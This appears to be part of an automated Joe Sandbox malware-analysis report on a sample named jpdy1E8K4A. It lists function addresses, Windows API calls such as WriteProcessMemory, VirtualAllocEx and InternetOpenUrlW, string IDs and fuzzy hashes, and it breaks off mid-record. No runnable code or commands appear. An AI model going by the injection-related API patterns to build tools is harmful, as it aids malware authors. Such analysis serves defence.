                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                                                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                • API String ID: 708495834-557222456
                                                                                                • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                                                • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                                                                • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                                                • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                                                                Function 0043659E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                                                                  • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                                                                  • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                                                                  • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                                                                  • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                                                                • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                • String ID: @
                                                                                                • API String ID: 4150878124-2766056989
                                                                                                • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                                • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                                                                • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                                • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                                                                Function 0044F137 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID: \$]$h
                                                                                                • API String ID: 4104443479-3262404753
                                                                                                • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                                                • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                                                                • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                                                • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                                                                Function 00457C53 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 158COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                • CloseHandle.KERNEL32(?), ref: 00457E09
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                                                                • String ID: <$@
                                                                                                • API String ID: 2417854910-1426351568
                                                                                                • Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                                                                • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                                                                • Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                                                                • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                                                                Function 0044A856 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122networkCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                                                                  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                                                • String ID:
                                                                                                • API String ID: 3705125965-3916222277
                                                                                                • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                                                • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                                                                • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                                                • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                                                                Function 0045FA41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                                                                • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                                                                • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Menu$Delete$InfoItem
                                                                                                • String ID: 0
                                                                                                • API String ID: 135850232-4108050209
                                                                                                • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                                                • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                                                                • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                                                • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                                                                Function 004507B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Long
                                                                                                • String ID: SysTreeView32
                                                                                                • API String ID: 847901565-1698111956
                                                                                                • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                                                • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                                                                • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                                                • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                                                                Function 00450D6B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Window
                                                                                                • String ID: SysMonthCal32
                                                                                                • API String ID: 2326795674-1439706946
                                                                                                • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                                                • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                                                                • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                                                • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                                                                Function 004509D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: DestroyWindow
                                                                                                • String ID: msctls_updown32
                                                                                                • API String ID: 3375834691-2298589950
                                                                                                • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                                • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                                                                • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                                • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                                                                Function 0044DC13 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID: $<
                                                                                                • API String ID: 4104443479-428540627
                                                                                                • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                                                • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                                                                • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                                                • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                                                                Function 0045D779 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorMode$DiskFreeSpace
                                                                                                • String ID: \VH
                                                                                                • API String ID: 1682464887-234962358
                                                                                                • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                                                • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                                                                • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                                                • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                                                                Function 0045D78F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorMode$DiskFreeSpace
                                                                                                • String ID: \VH
                                                                                                • API String ID: 1682464887-234962358
                                                                                                • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                                • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                                                                • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                                • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                                                                Function 0045D86D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorMode$DiskFreeSpace
                                                                                                • String ID: \VH
                                                                                                • API String ID: 1682464887-234962358
                                                                                                • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                                • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                                                                • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                                • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                                                                Function 0045D36D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                                                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorMode$InformationVolume
                                                                                                • String ID: \VH
                                                                                                • API String ID: 2507767853-234962358
                                                                                                • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                                • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
